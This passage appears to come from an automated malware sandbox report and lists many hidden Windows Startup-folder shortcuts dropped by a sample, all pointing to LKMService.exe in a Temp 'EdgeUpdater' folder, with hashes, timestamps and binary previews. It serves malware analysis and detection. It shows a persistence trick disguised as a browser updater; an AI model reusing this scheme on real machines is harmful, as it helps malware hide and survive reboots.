Preview:	L..................F....".....X:3...'G.<3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_38b12ffdc3054b75a4cc42355d27321a.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:08 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.937073190614132
Encrypted:	false
SSDEEP:	24:8JRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:83JD3lfAvRAt41vgHyg
MD5:	E6E5E99ED0EB5932F7958EA4AF3BCC9E
SHA1:	0E0BF21AD7B2E6B85C3F029ED43E022EAD7372DD
SHA-256:	A25E81E477647C8960832374489316A2B162A0565A9C442E50F1F655503FE233
SHA-512:	520FF7904D51BD22D0843C0DC93E7B713BD09F87AA1EFDBAF68C1F63DB9C195D34EE392940F50C182A4BC1D528AA3F125BECBDAF8F1BFDA053FD5E219ED22418
Malicious:	false
Preview:	L..................F....".....X:3....A.\3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3a7884e208224a6c873f89801ccde078.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:20 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.9371221825109135
Encrypted:	false
SSDEEP:	24:8+VRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8QJD3lfAvRAt41vgHyg
MD5:	B828A32076F70162F612588ADF0C01A6
SHA1:	2C7F0B684891C5E887B1E00A75EB3555C800EB59
SHA-256:	E96E0CCE0142FD36ED13713CFF481AD20B12B882DE317157570F5A9E2278B54D
SHA-512:	FBE70A1F5078380370C90656DDF51BA1368F48860E05944AEBCCEDC1C744D26F69F8F7E940C7C632B2B6ECC57D17710396C50D1683D8123723C8985F5844245F
Malicious:	false
Preview:	L..................F....".....X:3....Td@3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_41851dcfce50420bb4154e63f25f2a8e.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:59 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.941691766625291
Encrypted:	false
SSDEEP:	24:8dRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8TJD3lfAvRAt41vgHyg
MD5:	CF7480CB36415569C627221436AE0BFC
SHA1:	F4D4482BB67FFC50E2745BFB9E8725E6A9E09043
SHA-256:	CB29BA9C39FF6FE3AE34E583DB475A082751419E96DDAE476AD98C39B370231E
SHA-512:	9DE4214435D7EA2009D9A6B1E99B19E7D949C1AF791CD49CDE59DAB4462BF599E6A3E505571C28A9F0FA18C6758E882BF6EB973041AF441113BE749EFB719FA6
Malicious:	false
Preview:	L..................F....".....X:3......W3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_46234ffc04244b23ac4dc3e0979a0b7d.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:58 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.93705390887754
Encrypted:	false
SSDEEP:	24:8mRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8wJD3lfAvRAt41vgHyg
MD5:	E4BBF50FDE195699A3D2B6B307D9EC41
SHA1:	9AC36022917FB72B6E16D99626FE6507051DC89A
SHA-256:	57A99AA39D0C0D22E8706090ABEB1EE88DEB95F3DF1D5F76C8D8DA5384351F43
SHA-512:	25118E35741FA116A39693C9815FAC0BBEE41C9004F849AA461F5E7135372282E674618B0EC84DB9333760E8205C4B0C4E242012B6FB6F6DC6C1FCAB2F5E6AE9
Malicious:	false
Preview:	L..................F....".....X:3.....0W3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_513aa6e3c652483682fd1f51e46a8bd3.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:05 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.944730184533065
Encrypted:	false
SSDEEP:	24:8DhRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8DfJD3lfAvRAt41vgHyg
MD5:	982CF5F4EFFA8FD32566FAE981BB15A8
SHA1:	ED48B7C90988B455A531ECBEE16322EF7E33EBB4
SHA-256:	83327DE9D5813497ABB5A11ADF5B439E78B61209E2DCCA842CE87799028F1A5A
SHA-512:	5B3D86A811EFA95564DB4B71615699632DF0D6AA0A85E8910C1DC21A994424CC8CA2610190442C5219B0605EC52F4C0853A905F825199CB881FA647ADC9A5B9F
Malicious:	false
Preview:	L..................F....".....X:3...z.{[3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_55c2eb9fb8194b3183dae4b65fdda1b5.lnk

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:10 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.935797345001403
Encrypted:	false
SSDEEP:	24:8ERigD3lXPXQvRdgKdZtgKxtKSAwav/42eMKUBqygm:8CTD3lfAvRQ241vgHyg
MD5:	2C7E7A362FF34BA1B40B8C9D354BB073
SHA1:	1491BE4F61B10FAAEC734129E0B45005D236D29E
SHA-256:	2836A58B38096D1D50C3342BEA57735282817C55AA0686A3C6D0958FADEB1C51
SHA-512:	AC0698966802AD92FC1B658D12EB32576D8708415EFB89195B49C9F47E745278DAB4F76933E5DA55874ABB88C2FEA5E9A69B15A0985B4990A7B66E5C450030D4
Malicious:	false
Preview:	L..................F....".....X:3.....X:3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53.....p:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYD...Temp..:......EW<2CYD.....^......................z.T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...........................BS..E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_59312c45173e49bd8b855b176d5a495f.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:16 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.940355392804974
Encrypted:	false
SSDEEP:	24:8lLRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8l9JD3lfAvRAt41vgHyg
MD5:	C9FCC4C10E1D7D93ECC7E6292DEA4F35
SHA1:	D26A9D7CEE474B83FD2BBA5633B7C750929EE151
SHA-256:	AA6ADF4895E7BF9218D1B0430DF98266905758878CC9E400C11E0AA16EED55CE
SHA-512:	BF5843ADBE7129DF0B3B60927499CE719395E37077DD5A8FFDCBF281E5F7F6C8DC670DBB29383ED49564865FEBEA52AF2456D2A1D49CDF908499E80F49A46A17
Malicious:	false
Preview:	L..................F....".....X:3....}.a3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5f419d2562814795914a60f7e574128b.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:00 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.939195300123907
Encrypted:	false
SSDEEP:	24:80RJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8yJD3lfAvRAt41vgHyg
MD5:	DDB4B72A0CFD7A324D17C68537F49101
SHA1:	0415ED553FB7A9C78BB57DC8C352CF87DCC84AED
SHA-256:	D1A3A88F44E77C7C91956810570228D5E35DA519226DE20E74A1E8E5E092F69D
SHA-512:	DDBC6A95625160C1D80623FDF519AD1AEB5005C7D44947C3FC8D89073895BF7748BF597422FC7152B56CA015109DF8FCCAC16E6DC5C648D085CB8A44A2B74AEB
Malicious:	false
Preview:	L..................F....".....X:3....rX3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_621b8830c943464c9d47e42d99b46857.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:24 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.941998608356436
Encrypted:	false
SSDEEP:	24:8mRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8wJD3lfAvRAt41vgHyg
MD5:	1FE8BBAE1C2ACFA0C0F1297100023D48
SHA1:	10D971A3DE3AAD971EBA10C721AFE54DC0E6942E
SHA-256:	454660931D390CD4D9AA189850CA3263D02017C060703C8EF6CA10409330DD2D
SHA-512:	32FECB96320C2E3ABB7A9A22634D259E5476B89763993BA0BDB6BEEF75A1A9C118B58FFC5CB4EE8E113E70A5A307572E1930F835BAFB80F6F053E90AE48AC591
Malicious:	false
Preview:	L..................F....".....X:3......B3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_687a9749c9a44df689e436ec246c5fcc.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:49 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.941691766625289
Encrypted:	false
SSDEEP:	24:8CRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8EJD3lfAvRAt41vgHyg
MD5:	EA31A132DF6F472C8F551F4B6841C820
SHA1:	CA1AB3B48A8ADA1F7B420F1C65BD16EAC689D7D3
SHA-256:	924F4293F285575B9563D7E2CFAF3141135184D60DB46A011E69921A278352DA
SHA-512:	5D6BF2613CB9683BA0203FEE9D97515730AE1B15BED0486582AF1BE974BB10E79BEA72A2DFBE8B03678F2ABE7340F0E50838545C826E6152C1A7AA3AC8B3A43D
Malicious:	false
Preview:	L..................F....".....X:3...G.Q3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6bbe8cc63bcf4ed199794d58d51e869f.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:09 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.939093983521603
Encrypted:	false
SSDEEP:	24:83RRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8fJD3lfAvRAt41vgHyg
MD5:	C11BAC0F4ABAA2113D71A65560FE6F60
SHA1:	0A54672FCE0C7F24B64C59BD6D0F94E28F573E32
SHA-256:	431E67D233C68F863678812BEF7B0466A9E353B98F8183DCA8A2580ECFA82E2D
SHA-512:	906DE6C0A57DE168F0A869186F690DE4580EE28897A81EDF5612E51BA5981936E3A924D9845E3A3611316EE427F326D5CD5BF9AB3086A3003A0EB646A52B9B32
Malicious:	false
Preview:	L..................F....".....X:3...^.S]3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_70b4bf6c89434abb9c4a92d4a3107a31.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:21 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.939456899594942
Encrypted:	false
SSDEEP:	24:8NeRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8yJD3lfAvRAt41vgHyg
MD5:	41963B10055F98B592277CE3EDE0C3BA
SHA1:	2BA67C3E61B8FB842A5BC4E2A17BF9A20B08A88D
SHA-256:	AC7C771BF2F60AA5EDAC11486DD287B2FF226E4776393DEF053C305B66EC709E
SHA-512:	CE5DFEDE6EB15C55B34003B528437A407C7DF110AA8267E93CE87C384A6F3515B67202AFDA14548BFDBADD54EED8DEDE09AB22D1DF5DC4B49CF9D9D639CC472B
Malicious:	false
Preview:	L..................F....".....X:3...sN.@3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7172ee7a982744218b205a6832554ab3.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:51 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.940727753975689
Encrypted:	false
SSDEEP:	24:86RJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8MJD3lfAvRAt41vgHyg
MD5:	EE860F2409BA2E8417107FFC3D5E0E2F
SHA1:	DF581BE7AAE9909365FF8707D82A86B422852B43
SHA-256:	F9CA4BDBDA8523E27423F306D46CFFFD6510BA2D096680CCE12DB0FDEE8D2437
SHA-512:	E4C958CCAE9A66117B256F4FFBB00515B3DCB4693259790E8E974A540E8996C235B08E05521E9A1381103A8A5062384BB3A0E5BC8821122C990589C263DF5E47
Malicious:	false
Preview:	L..................F....".....X:3......R3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.